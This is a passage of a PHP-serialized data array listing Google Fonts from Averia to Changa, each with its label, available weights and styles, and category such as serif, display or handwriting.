Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Averia Gruesa Libre\";a:3:{s:5:\"label\";s:19:\"Averia Gruesa Libre\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Averia Libre\";a:3:{s:5:\"label\";s:12:\"Averia Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Averia Sans Libre\";a:3:{s:5:\"label\";s:17:\"Averia Sans Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:18:\"Averia Serif Libre\";a:3:{s:5:\"label\";s:18:\"Averia Serif Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"B612\";a:3:{s:5:\"label\";s:4:\"B612\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"B612 Mono\";a:3:{s:5:\"label\";s:9:\"B612 Mono\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:10:\"Bad Script\";a:3:{s:5:\"label\";s:10:\"Bad Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Bahiana\";a:3:{s:5:\"label\";s:7:\"Bahiana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Bahianita\";a:3:{s:5:\"label\";s:9:\"Bahianita\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Bai Jamjuree\";a:3:{s:5:\"label\";s:12:\"Bai Jamjuree\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Ballet\";a:3:{s:5:\"label\";s:6:\"Ballet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Baloo 2\";a:3:{s:5:\"label\";s:7:\"Baloo 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Baloo Bhai 2\";a:3:{s:5:\"label\";s:12:\"Baloo Bhai 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Baloo Bhaina 2\";a:3:{s:5:\"label\";s:14:\"Baloo Bhaina 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Baloo Chettan 2\";a:3:{s:5:\"label\";s:15:\"Baloo Chettan 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Baloo Da 2\";a:3:{s:5:\"label\";s:10:\"Baloo Da 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Baloo Paaji 2\";a:3:{s:5:\"label\";s:13:\"Baloo Paaji 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Baloo Tamma 2\";a:3:{s:5:\"label\";s:13:\"Baloo Tamma 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Baloo Tammudu 2\";a:3:{s:5:\"label\";s:15:\"Baloo Tammudu 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Baloo Thambi 2\";a:3:{s:5:\"label\";s:14:\"Baloo Thambi 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Balsamiq Sans\";a:3:{s:5:\"label\";s:13:\"Balsamiq Sans\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Balthazar\";a:3:{s:5:\"label\";s:9:\"Balthazar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Bangers\";a:3:{s:5:\"label\";s:7:\"Bangers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Barlow\";a:3:{s:5:\"label\";s:6:\"Barlow\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Barlow Condensed\";a:3:{s:5:\"label\";s:16:\"Barlow Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Barlow Semi Condensed\";a:3:{s:5:\"label\";s:21:\"Barlow Semi Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Barriecito\";a:3:{s:5:\"label\";s:10:\"Barriecito\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Barrio\";a:3:{s:5:\"label\";s:6:\"Barrio\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Basic\";a:3:{s:5:\"label\";s:5:\"Basic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Baskervville\";a:3:{s:5:\"label\";s:12:\"Baskervville\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Battambang\";a:3:{s:5:\"label\";s:10:\"Battambang\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Baumans\";a:3:{s:5:\"label\";s:7:\"Baumans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Bayon\";a:3:{s:5:\"label\";s:5:\"Bayon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Be Vietnam\";a:3:{s:5:\"label\";s:10:\"Be Vietnam\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Bebas Neue\";a:3:{s:5:\"label\";s:10:\"Bebas Neue\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Belgrano\";a:3:{s:5:\"label\";s:8:\"Belgrano\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Bellefair\";a:3:{s:5:\"label\";s:9:\"Bellefair\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Belleza\";a:3:{s:5:\"label\";s:7:\"Belleza\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Bellota\";a:3:{s:5:\"label\";s:7:\"Bellota\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Bellota Text\";a:3:{s:5:\"label\";s:12:\"Bellota Text\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"BenchNine\";a:3:{s:5:\"label\";s:9:\"BenchNine\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Benne\";a:3:{s:5:\"label\";s:5:\"Benne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Bentham\";a:3:{s:5:\"label\";s:7:\"Bentham\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Berkshire Swash\";a:3:{s:5:\"label\";s:15:\"Berkshire Swash\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Beth Ellen\";a:3:{s:5:\"label\";s:10:\"Beth Ellen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Bevan\";a:3:{s:5:\"label\";s:5:\"Bevan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:21:\"Big Shoulders Display\";a:3:{s:5:\"label\";s:21:\"Big Shoulders Display\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:28:\"Big Shoulders Inline Display\";a:3:{s:5:\"label\";s:28:\"Big Shoulders Inline Display\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:25:\"Big Shoulders Inline Text\";a:3:{s:5:\"label\";s:25:\"Big Shoulders Inline Text\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:29:\"Big Shoulders Stencil Display\";a:3:{s:5:\"label\";s:29:\"Big Shoulders Stencil Display\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:26:\"Big Shoulders Stencil Text\";a:3:{s:5:\"label\";s:26:\"Big Shoulders Stencil Text\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:18:\"Big Shoulders Text\";a:3:{s:5:\"label\";s:18:\"Big Shoulders Text\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Bigelow Rules\";a:3:{s:5:\"label\";s:13:\"Bigelow Rules\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Bigshot One\";a:3:{s:5:\"label\";s:11:\"Bigshot One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Bilbo\";a:3:{s:5:\"label\";s:5:\"Bilbo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:16:\"Bilbo Swash Caps\";a:3:{s:5:\"label\";s:16:\"Bilbo Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"BioRhyme\";a:3:{s:5:\"label\";s:8:\"BioRhyme\";s:8:\"variants\";a:5:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"BioRhyme Expanded\";a:3:{s:5:\"label\";s:17:\"BioRhyme Expanded\";s:8:\"variants\";a:5:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Biryani\";a:3:{s:5:\"label\";s:7:\"Biryani\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Bitter\";a:3:{s:5:\"label\";s:6:\"Bitter\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:23:\"Black And White Picture\";a:3:{s:5:\"label\";s:23:\"Black And White Picture\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Black Han Sans\";a:3:{s:5:\"label\";s:14:\"Black Han Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Black Ops One\";a:3:{s:5:\"label\";s:13:\"Black Ops One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Blinker\";a:3:{s:5:\"label\";s:7:\"Blinker\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Bodoni Moda\";a:3:{s:5:\"label\";s:11:\"Bodoni Moda\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Bokor\";a:3:{s:5:\"label\";s:5:\"Bokor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Bona Nova\";a:3:{s:5:\"label\";s:9:\"Bona Nova\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Bonbon\";a:3:{s:5:\"label\";s:6:\"Bonbon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Boogaloo\";a:3:{s:5:\"label\";s:8:\"Boogaloo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Bowlby One\";a:3:{s:5:\"label\";s:10:\"Bowlby One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Bowlby One SC\";a:3:{s:5:\"label\";s:13:\"Bowlby One SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Brawler\";a:3:{s:5:\"label\";s:7:\"Brawler\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Bree Serif\";a:3:{s:5:\"label\";s:10:\"Bree Serif\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Brygada 1918\";a:3:{s:5:\"label\";s:12:\"Brygada 1918\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Bubblegum Sans\";a:3:{s:5:\"label\";s:14:\"Bubblegum Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Bubbler One\";a:3:{s:5:\"label\";s:11:\"Bubbler One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Buda\";a:3:{s:5:\"label\";s:4:\"Buda\";s:8:\"variants\";a:1:{i:0;s:3:\"300\";}s:8:\"category\";s:7:\"display\";}s:7:\"Buenard\";a:3:{s:5:\"label\";s:7:\"Buenard\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Bungee\";a:3:{s:5:\"label\";s:6:\"Bungee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Bungee Hairline\";a:3:{s:5:\"label\";s:15:\"Bungee Hairline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Bungee Inline\";a:3:{s:5:\"label\";s:13:\"Bungee Inline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Bungee Outline\";a:3:{s:5:\"label\";s:14:\"Bungee Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Bungee Shade\";a:3:{s:5:\"label\";s:12:\"Bungee Shade\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Butcherman\";a:3:{s:5:\"label\";s:10:\"Butcherman\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Butterfly Kids\";a:3:{s:5:\"label\";s:14:\"Butterfly Kids\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Cabin\";a:3:{s:5:\"label\";s:5:\"Cabin\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Cabin Condensed\";a:3:{s:5:\"label\";s:15:\"Cabin Condensed\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Cabin Sketch\";a:3:{s:5:\"label\";s:12:\"Cabin Sketch\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Caesar Dressing\";a:3:{s:5:\"label\";s:15:\"Caesar Dressing\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Cagliostro\";a:3:{s:5:\"label\";s:10:\"Cagliostro\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Cairo\";a:3:{s:5:\"label\";s:5:\"Cairo\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Caladea\";a:3:{s:5:\"label\";s:7:\"Caladea\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Calistoga\";a:3:{s:5:\"label\";s:9:\"Calistoga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Calligraffitti\";a:3:{s:5:\"label\";s:14:\"Calligraffitti\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Cambay\";a:3:{s:5:\"label\";s:6:\"Cambay\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Cambo\";a:3:{s:5:\"label\";s:5:\"Cambo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Candal\";a:3:{s:5:\"label\";s:6:\"Candal\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Cantarell\";a:3:{s:5:\"label\";s:9:\"Cantarell\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Cantata One\";a:3:{s:5:\"label\";s:11:\"Cantata One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Cantora One\";a:3:{s:5:\"label\";s:11:\"Cantora One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Capriola\";a:3:{s:5:\"label\";s:8:\"Capriola\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Cardo\";a:3:{s:5:\"label\";s:5:\"Cardo\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Carme\";a:3:{s:5:\"label\";s:5:\"Carme\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Carrois Gothic\";a:3:{s:5:\"label\";s:14:\"Carrois Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Carrois Gothic SC\";a:3:{s:5:\"label\";s:17:\"Carrois Gothic SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Carter One\";a:3:{s:5:\"label\";s:10:\"Carter One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Castoro\";a:3:{s:5:\"label\";s:7:\"Castoro\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Catamaran\";a:3:{s:5:\"label\";s:9:\"Catamaran\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Caudex\";a:3:{s:5:\"label\";s:6:\"Caudex\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Caveat\";a:3:{s:5:\"label\";s:6:\"Caveat\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Caveat Brush\";a:3:{s:5:\"label\";s:12:\"Caveat Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:18:\"Cedarville Cursive\";a:3:{s:5:\"label\";s:18:\"Cedarville Cursive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Ceviche One\";a:3:{s:5:\"label\";s:11:\"Ceviche One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Chakra Petch\";a:3:{s:5:\"label\";s:12:\"Chakra Petch\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Changa\";a:3:{s:5:\"label\";s:6:\"Changa\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Changa One\";a:3:{s:5:\"label\";s:10:\"Changa 